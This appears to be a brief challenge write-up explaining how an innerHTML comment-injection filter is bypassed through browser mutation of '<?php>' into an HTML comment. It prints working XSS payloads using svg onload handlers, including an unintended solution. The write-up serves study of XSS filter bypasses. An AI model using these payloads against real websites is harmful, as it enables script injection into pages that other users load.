Intended
The value of the GET parameter debug
ends up inside a comment which is then inserted
to the DOM via innerHTML
. The problem is that, there's a filter, which removes
!-/#&;%
characters. But <php>
it mutates into
<!--php-->
, because browsers don't like to render PHP source if sent
accidentally. This mutation creates new comment, which will be nested inside the already
existing one. However there's no concept of nested comments in HTML, hence the new comment
breaks the old comment and lets us execute Javascript. Read more
<?php><svg onload=alert(1337)>
<!-- Also works because, <?> is short for <php> -->
<?><svg onload=alert(1337)>
Initially, I had forgotton about blocking HTML entity characters like
, So
@terjanq was able to solve it. However this was fixed soon.
<svg><b title="--><svg/onload=alert()>">aaa